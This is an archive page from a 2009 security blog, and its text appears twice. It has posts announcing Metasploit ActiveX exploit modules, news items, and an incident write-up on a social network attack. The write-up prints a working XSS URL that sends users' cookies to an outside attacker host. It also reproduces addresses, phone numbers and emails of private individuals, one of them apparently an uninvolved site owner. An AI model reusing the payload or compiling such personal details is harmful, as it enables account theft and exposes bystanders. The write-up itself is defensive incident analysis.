Recognize-Security

Roxio CinePlayer ActiveX Control Buffer Overflow exploit (meta)

Posted by Trancer on Apr 30 2009

Roxio And another new exploit module for Metasploit.
This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to ‘DiskType’, an attacker can overrun a buffer and execute arbitrary code.

This vulnerability was found by Carsten Eiram of Secunia Research back in April 2007. No patch or any kind of solution is offered by the vendor. Also, there was no public exploit for this vulnerability, until now ;-)

Download roxio_cineplayer.rb.
Also on Metasploit.

References:
CVE-2007-1559
BID 23412
OSVDB 34779

Categories: Exploits, Metasploit

0 Comments | Comments RSS | TrackBack URL

Autodesk IDrop ActiveX Control Heap Memory Corruption exploit (meta)

Posted by Trancer on Apr 30 2009

Wrote a new Metaspoit exploit module for the Autodesk IDrop ActiveX control heap-based memory corruption vulnerability.

This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties.

This vulnerability was found by Elazar Board and apparently Autodesk is not going to fix this issue… Better flip on the killbit for this one.

Download autodesk_idrop.rb.
Also on Metasploit.

References:
BID 34352
OSVDB 53265
milw0rm 8560

Categories: Exploits, Metasploit

0 Comments | Comments RSS | TrackBack URL

Verizon Data Breach Investigations Report 2009

Posted by Trancer on Apr 30 2009

The Verizon Data Breach Investigations Report for 2009 released few days ago.
The report summarize the state of cyber-crime for 2008, covering sources of data breaches, threats and attack vectors, who and what kind of data are getting compromised.
Interesting reading and a great source for statistics.
Verizon Data Breach Investigations Report 2009.

Categories: Security News

0 Comments | Comments RSS | TrackBack URL

The Case of a TinyURL in Mekusharim

Posted by Trancer on Apr 30 2009

First of all, if you don’t know what Mekusharim is, here’s a little introduction:
Mekusharim is an Israeli social network founded in 2005 by three ambitious guys and currently have more then 1 million registered users. It’s very similar to any standard social network, it have users profile pages, albums, videos, mailing system and articles, pools and forums sections.
Recently Walla! acquired additional 36 percent of Mekusharim in 4.5 million NIS (out of 12.5 million NIS value assessment), giving Walla! a total of 70 percent share holding of Mekusharim.
I’ve had the pleasure of working with the Mekusharim guys on various security issues since 2006, mostly on finding and help fixing web application vulnerabilities.
Like most of the social networks out there, Mekusharim is a great platform for attackers to spread their malware and reach a high amount of users in a short period of time, take Samy of MySpace for example.
The first time I contacted Mekusharim was right after I wrote a proof-of-concept web worm that can spread through the site, infecting users profile pages and stealing user cookies. It was written in two lines of JavaScript code and exploit a Cross-Site Scripting and a Cross-Site Request Forgery vulnerabilities.
But that’s water under the bridge, Mekusharim have switched several systems (PHP -> ASP -> ASP.NET) and is much more secure nowadays. And if someone will try hacking it, I’ll be after the poor bastard :-)

Which brings us to the main subject of this post. Few days ago I got a mail message in Mekusharim from a friend user, that looks like this:

Click to enlarge.

As you can see, the message subject is “:)” and the message body contains a TinyURL link.
Something smells fishy here… Previewing the link will discover that this is definitely a XSS attack:

Click to enlarge.

The TinyURL link redirects to:
http://www.mekusharim.co.il/forums/ForumsList.aspx?Display=1&TagName='\';x=new%20Image();x.src="http://oritor.co.il/cgi-bin/mekusharim.php?cookie="%2Bdocument.cookie;//

Click to enlarge.

The URL exploits a XSS vulnerability in the forums system (ForumsList.aspx page, TagName parameter), sending the user cookie to the attacker pre-made page located at oritor.co.il/cgi-bin/mekusharim.php.

The first thing that crossed my mind is getting some information on oritor.co.il domain and his owner. Running a quick whois on the domain reveals a lot of useful information:
domain: oritor.co.il descr: orit bokobza descr: ezra 20 descr: rishon leztion descr: 75515 descr: Israel phone: +972 50 8836620 e-mail: orit123 AT bezeqint.net admin-c: LD-OB3906-IL tech-c: LD-OB3906-IL zone-c: LD-OB3906-IL nserver: ns1.xoox.co.il nserver: ns2.xoox.co.il validity: 16-12-2009 status: Transfer Locked changed: domain-registrar AT isoc.org.il 20081216 (Assigned) person: orit bokobza address: ezra 20 address: rishon leztion address: 75515 address: Israel phone: +972 50 8836620 e-mail: orit123 AT bezeqint.net nic-hdl: LD-OB3906-IL changed: domain-registrar AT isoc.org.il 20081216 registrar name: LiveDns Ltd Registrar info: http://domains.livedns.co.il % Rights to the data above are restricted by copyright.

The domain oritor.co.il is registered to Orit Bokobza from Ezra 20 street, Rishon Leztion. Orit cellular phone number is 0508836620 (Pelephone) and she registered the domain using her ISP email address, which reveal that she’s registered to Bezeq International ISP under the username orit123. We also see that the site DNS is registered to xoox.co.il NS servers, we’ll get to that later.
Digging deeper using b144.co.il, searching Orit Bokobza from Rishon Leztion gives one identical match (same address and house number), reveal she have another cellular phone number – 0545455382 (Orange):

Click to enlarge.

b144 also gives us a map to the house and a picture of the house itself:

Click to enlarge.

Cool.
Digging further, Googling her email address and retrieving additional information from her web site and posts from forums she’s active in reveals that she’s some kind of personal holistic trainer and has master in energetic healing.
At this point I’m quite sure that she’s got nothing to do with this XSS attack on Mekusharim but it’s a good place to start investigating and tracking down the attacker. My guess is that her site is being used by the attacker who compromised the hosting server.
Let’s take a look at what web sites is hosted on the same server using Live Search ip: search feature:
http://search.live.com/results.aspx?q=ip:91.198.129.47

We see that this hosting server also host xoox.co.il which is the same oritor.co.il site DNS provider as resolved from the whois. Something tells me the holistic master got no technical skills at all so xoox.co.il administrator will be a better person to talk to and get additional information about the XSS attack.
Running whois on xoox.co.il:
domain: xoox.co.il descr: Shlomi Rabia descr: Agibor Almoni 13 descr: Tel Aviv descr: 67421 descr: Israel phone: +972 50 7809313 e-mail: xoox AT bezeqint.net admin-c: II-SR5955-IL tech-c: II-SR5955-IL zone-c: II-SR5955-IL nserver: ns1.xoox.co.il nserver: ns10.rehost.co.il validity: 14-10-2010 status: Transfer Allowed changed: domain-registrar AT isoc.org.il 20041014 (Assigned) changed: domain-registrar AT isoc.org.il 20041017 (Changed) changed: domain-registrar AT isoc.org.il 20041229 (Changed) changed: domain-registrar AT isoc.org.il 20070510 (Changed) changed: domain-registrar AT isoc.org.il 20070805 (Changed) changed: domain-registrar AT isoc.org.il 20070809 (Changed) changed: domain-registrar AT isoc.org.il 20080731 (Changed) changed: domain-registrar AT isoc.org.il 20080731 (Changed) changed: domain-registrar AT isoc.org.il 20080804 (Changed) changed: domain-registrar AT isoc.org.il 20081026 (Changed) person: Shlomi Rabia address: Agibor Almoni 13 address: Tel Aviv address: 67421 address: Israel e-mail: xoox AT bezeqint.net nic-hdl: II-SR5955-IL changed: domain-registrar AT isoc.org.il 20041014 registrar name: Israel Internet Association ISOC-IL Registrar info: www.isoc.org.il % Rights to the data above are restricted by copyright.

This provide enough information for the right person to contact and conduct further investigation.

I gave all this information to the Mekusharim guys few hours after the attack started, hope this is enough information they need to stop the attack as soon as possible. Meanwhile, the XSS vulnerability got fixed.

Categories: Web Application Security

2 Comments | Comments RSS | TrackBack URL

Twitter XSS Worms

Posted by Trancer on Apr 13 2009

For the past few days two web worms are spreading through Twitter, the popular social micro-blogging utility. The first worm, called the “StalkDaily” worm, start spreading on Saturday, infect user profile pages, steal users browser cookies and post unwanted tweets. A second variation called the “Mikeyy” worm, start spreading on Sunday and does pretty much the same.
The worms use a Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities to spread, which the Twitter guys already closed.
Both worms were created by Michael “Mikeyy” Mooney, a 17 year old teenager. You can read an interview with Mooney on CNET News.

Here’s both “StalkDaily” worm and “Mikeyy” worm JavaScript code, for educational purposes.

Further reading:
Twitter Blog: Wily Weekend Worms.
F-Secure – Twitter worm outbreak over Easter.
Twitter Worm Analysis by Ryan Barnett.

Categories: Malware

0 Comments | Comments RSS | TrackBack URL

Microsoft Security Intelligence Report volume 6

Posted by Trancer on Apr 09 2009

The Microsoft Security Intelligence Report volume 6 (July through December 2008) released.
The report summarize security and exploit trends, the internet cyber-crime state and Microsoft products vulnerabilities and exploitation in-the-wild for the second half of 2008.
I find the report very interesting and I strongly recommend reading it.
Microsoft Security Intelligence Report volume 6.

Categories: Security News

0 Comments | Comments RSS | TrackBack URL

Israeli Hacking Convention 2009

Posted by Trancer on Apr 09 2009

Since Y2Hack (2000) and Y2Hack4 (2004) there was no hacking convention held in Israel. That’s just sad because Israel is a small country and have a lot of great minds in the field, and I think having such an event at least once a year will contribute a lot to the Israeli hacking community and will take it few steps forward.
This year, Thanks to the ambitiousness of Yaniv Miron, we’ll get a hacking convention in Israel:

The convention will be held on 24/05/2009 at the American Zionist House in Tel Aviv and will include:

Hacking lectures.
Information security lectures.
Hacking Wargames.
Book Crossing.
Pizzas!

Go sign up! For further information check out IL.Hack 2009 web site (Hebrew), or the IL.Hack 2009 English information page.
You can also approve attendance at the convention Facebook event.

Note that more sponsors are needed, so if some of the readers can arrange something, please contact Yaniv Miron – info@ilhack.org.

Hope to see you there :-)

Categories: Security News

3 Comments | Comments RSS | TrackBack URL

Recognize-Security Welcome to the Machine April 2009

Roxio CinePlayer ActiveX Control Buffer Overflow exploit (meta) Posted by Trancer on Apr 30 2009 And another new exploit module for Metasploit. This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to ‘DiskType’, an attacker can overrun a buffer and execute arbitrary code. This vulnerability was found by Carsten Eiram of Secunia Research back in April 2007. No patch or any kind of solution is offered by the vendor. Also, there was no public exploit for this vulnerability, until now ;-) Download roxio_cineplayer.rb. Also on Metasploit. References: CVE-2007-1559 BID 23412 OSVDB 34779 Categories: Exploits, Metasploit 0 Comments \| Comments RSS \| TrackBack URL Autodesk IDrop ActiveX Control Heap Memory Corruption exploit (meta) Posted by Trancer on Apr 30 2009 Wrote a new Metaspoit exploit module for the Autodesk IDrop ActiveX control heap-based memory corruption vulnerability. This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties. This vulnerability was found by Elazar Board and apparently Autodesk is not going to fix this issue… Better flip on the killbit for this one. Download autodesk_idrop.rb. Also on Metasploit. References: BID 34352 OSVDB 53265 milw0rm 8560 Categories: Exploits, Metasploit 0 Comments \| Comments RSS \| TrackBack URL Verizon Data Breach Investigations Report 2009 Posted by Trancer on Apr 30 2009 The Verizon Data Breach Investigations Report for 2009 released few days ago. The report summarize the state of cyber-crime for 2008, covering sources of data breaches, threats and attack vectors, who and what kind of data are getting compromised. Interesting reading and a great source for statistics. Verizon Data Breach Investigations Report 2009. Categories: Security News 0 Comments \| Comments RSS \| TrackBack URL The Case of a TinyURL in Mekusharim Posted by Trancer on Apr 30 2009 First of all, if you don’t know what Mekusharim is, here’s a little introduction: Mekusharim is an Israeli social network founded in 2005 by three ambitious guys and currently have more then 1 million registered users. It’s very similar to any standard social network, it have users profile pages, albums, videos, mailing system and articles, pools and forums sections. Recently Walla! acquired additional 36 percent of Mekusharim in 4.5 million NIS (out of 12.5 million NIS value assessment), giving Walla! a total of 70 percent share holding of Mekusharim. I’ve had the pleasure of working with the Mekusharim guys on various security issues since 2006, mostly on finding and help fixing web application vulnerabilities. Like most of the social networks out there, Mekusharim is a great platform for attackers to spread their malware and reach a high amount of users in a short period of time, take Samy of MySpace for example. The first time I contacted Mekusharim was right after I wrote a proof-of-concept web worm that can spread through the site, infecting users profile pages and stealing user cookies. It was written in two lines of JavaScript code and exploit a Cross-Site Scripting and a Cross-Site Request Forgery vulnerabilities. But that’s water under the bridge, Mekusharim have switched several systems (PHP -> ASP -> ASP.NET) and is much more secure nowadays. And if someone will try hacking it, I’ll be after the poor bastard :-) Which brings us to the main subject of this post. Few days ago I got a mail message in Mekusharim from a friend user, that looks like this: Click to enlarge. As you can see, the message subject is “:)” and the message body contains a TinyURL link. Something smells fishy here… Previewing the link will discover that this is definitely a XSS attack: Click to enlarge. The TinyURL link redirects to: `http://www.mekusharim.co.il/forums/ForumsList.aspx?Display=1&TagName='\';x=new%20Image();x.src="http://oritor.co.il/cgi-bin/mekusharim.php?cookie="%2Bdocument.cookie;//` Click to enlarge. The URL exploits a XSS vulnerability in the forums system (`ForumsList.aspx` page, `TagName` parameter), sending the user cookie to the attacker pre-made page located at `oritor.co.il/cgi-bin/mekusharim.php`. The first thing that crossed my mind is getting some information on `oritor.co.il` domain and his owner. Running a quick whois on the domain reveals a lot of useful information: domain: oritor.co.il descr: orit bokobza descr: ezra 20 descr: rishon leztion descr: 75515 descr: Israel phone: +972 50 8836620 e-mail: orit123 AT bezeqint.net admin-c: LD-OB3906-IL tech-c: LD-OB3906-IL zone-c: LD-OB3906-IL nserver: ns1.xoox.co.il nserver: ns2.xoox.co.il validity: 16-12-2009 status: Transfer Locked changed: domain-registrar AT isoc.org.il 20081216 (Assigned) person: orit bokobza address: ezra 20 address: rishon leztion address: 75515 address: Israel phone: +972 50 8836620 e-mail: orit123 AT bezeqint.net nic-hdl: LD-OB3906-IL changed: domain-registrar AT isoc.org.il 20081216 registrar name: LiveDns Ltd Registrar info: http://domains.livedns.co.il % Rights to the data above are restricted by copyright. The domain `oritor.co.il` is registered to Orit Bokobza from Ezra 20 street, Rishon Leztion. Orit cellular phone number is 0508836620 (Pelephone) and she registered the domain using her ISP email address, which reveal that she’s registered to Bezeq International ISP under the username `orit123`. We also see that the site DNS is registered to `xoox.co.il` NS servers, we’ll get to that later. Digging deeper using b144.co.il, searching Orit Bokobza from Rishon Leztion gives one identical match (same address and house number), reveal she have another cellular phone number – 0545455382 (Orange): Click to enlarge. b144 also gives us a map to the house and a picture of the house itself: Click to enlarge. Cool. Digging further, Googling her email address and retrieving additional information from her web site and posts from forums she’s active in reveals that she’s some kind of personal holistic trainer and has master in energetic healing. At this point I’m quite sure that she’s got nothing to do with this XSS attack on Mekusharim but it’s a good place to start investigating and tracking down the attacker. My guess is that her site is being used by the attacker who compromised the hosting server. Let’s take a look at what web sites is hosted on the same server using Live Search `ip:` search feature: http://search.live.com/results.aspx?q=ip:91.198.129.47 We see that this hosting server also host `xoox.co.il` which is the same `oritor.co.il` site DNS provider as resolved from the whois. Something tells me the holistic master got no technical skills at all so `xoox.co.il` administrator will be a better person to talk to and get additional information about the XSS attack. Running whois on `xoox.co.il`: domain: xoox.co.il descr: Shlomi Rabia descr: Agibor Almoni 13 descr: Tel Aviv descr: 67421 descr: Israel phone: +972 50 7809313 e-mail: xoox AT bezeqint.net admin-c: II-SR5955-IL tech-c: II-SR5955-IL zone-c: II-SR5955-IL nserver: ns1.xoox.co.il nserver: ns10.rehost.co.il validity: 14-10-2010 status: Transfer Allowed changed: domain-registrar AT isoc.org.il 20041014 (Assigned) changed: domain-registrar AT isoc.org.il 20041017 (Changed) changed: domain-registrar AT isoc.org.il 20041229 (Changed) changed: domain-registrar AT isoc.org.il 20070510 (Changed) changed: domain-registrar AT isoc.org.il 20070805 (Changed) changed: domain-registrar AT isoc.org.il 20070809 (Changed) changed: domain-registrar AT isoc.org.il 20080731 (Changed) changed: domain-registrar AT isoc.org.il 20080731 (Changed) changed: domain-registrar AT isoc.org.il 20080804 (Changed) changed: domain-registrar AT isoc.org.il 20081026 (Changed) person: Shlomi Rabia address: Agibor Almoni 13 address: Tel Aviv address: 67421 address: Israel e-mail: xoox AT bezeqint.net nic-hdl: II-SR5955-IL changed: domain-registrar AT isoc.org.il 20041014 registrar name: Israel Internet Association ISOC-IL Registrar info: www.isoc.org.il % Rights to the data above are restricted by copyright. This provide enough information for the right person to contact and conduct further investigation. I gave all this information to the Mekusharim guys few hours after the attack started, hope this is enough information they need to stop the attack as soon as possible. Meanwhile, the XSS vulnerability got fixed. Categories: Web Application Security 2 Comments \| Comments RSS \| TrackBack URL Twitter XSS Worms Posted by Trancer on Apr 13 2009 For the past few days two web worms are spreading through Twitter, the popular social micro-blogging utility. The first worm, called the “StalkDaily” worm, start spreading on Saturday, infect user profile pages, steal users browser cookies and post unwanted tweets. A second variation called the “Mikeyy” worm, start spreading on Sunday and does pretty much the same. The worms use a Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities to spread, which the Twitter guys already closed. Both worms were created by Michael “Mikeyy” Mooney, a 17 year old teenager. You can read an interview with Mooney on CNET News. Here’s both “StalkDaily” worm and “Mikeyy” worm JavaScript code, for educational purposes. Twitter “StalkDaily” worm code (unobfuscated). Twitter “Mikeyy” worm code (obfuscated). Further reading: Twitter Blog: Wily Weekend Worms. F-Secure – Twitter worm outbreak over Easter. Twitter Worm Analysis by Ryan Barnett. Categories: Malware 0 Comments \| Comments RSS \| TrackBack URL Microsoft Security Intelligence Report volume 6 Posted by Trancer on Apr 09 2009 The Microsoft Security Intelligence Report volume 6 (July through December 2008) released. The report summarize security and exploit trends, the internet cyber-crime state and Microsoft products vulnerabilities and exploitation in-the-wild for the second half of 2008. I find the report very interesting and I strongly recommend reading it. Microsoft Security Intelligence Report volume 6. Categories: Security News 0 Comments \| Comments RSS \| TrackBack URL Israeli Hacking Convention 2009 Posted by Trancer on Apr 09 2009 Since Y2Hack (2000) and Y2Hack4 (2004) there was no hacking convention held in Israel. That’s just sad because Israel is a small country and have a lot of great minds in the field, and I think having such an event at least once a year will contribute a lot to the Israeli hacking community and will take it few steps forward. This year, Thanks to the ambitiousness of Yaniv Miron, we’ll get a hacking convention in Israel: The convention will be held on 24/05/2009 at the American Zionist House in Tel Aviv and will include: Hacking lectures. Information security lectures. Hacking Wargames. Book Crossing. Pizzas! Go sign up! For further information check out IL.Hack 2009 web site (Hebrew), or the IL.Hack 2009 English information page. You can also approve attendance at the convention Facebook event. Note that more sponsors are needed, so if some of the readers can arrange something, please contact Yaniv Miron – info@ilhack.org. Hope to see you there :-) Categories: Security News 3 Comments \| Comments RSS \| TrackBack URL	Categories Advisories Articles Exploitation Exploits LOLz Malware Metasploit Presentations Rec-Sec Security News Tools Vulnerabilities Web Application Security Archives March 2010 January 2010 December 2009 November 2009 October 2009 September 2009 August 2009 July 2009 June 2009 May 2009 April 2009 March 2009 February 2009 December 2008 November 2008 October 2008 September 2008 August 2008 January 2008 June 2007 May 2007 April 2007 March 2007 February 2007 Pages About Recognize-Security Links BinaryVision BlackHat Security BugSec Ltd. Digital Whisper Extraexploit Inj3ct0r exploit database milw0rm NiX IRC Network NullByte Pankaj Kohli Peter Van Eeckhoutte The Metasploit Project TryThis0ne Udi Mosayev Uninformed xorl eax, eax Meta RSS 2.0 ATOM 1.0 RDF 1.0 Links OPML OpenSearch
Valid XHTML \| Valid CSS \| RSS \| Comments RSS Copyright © 2009 Recognize-Security. Some rights reserved. ~~Security~~ Hacking, However, is an art, not a science.

April 2009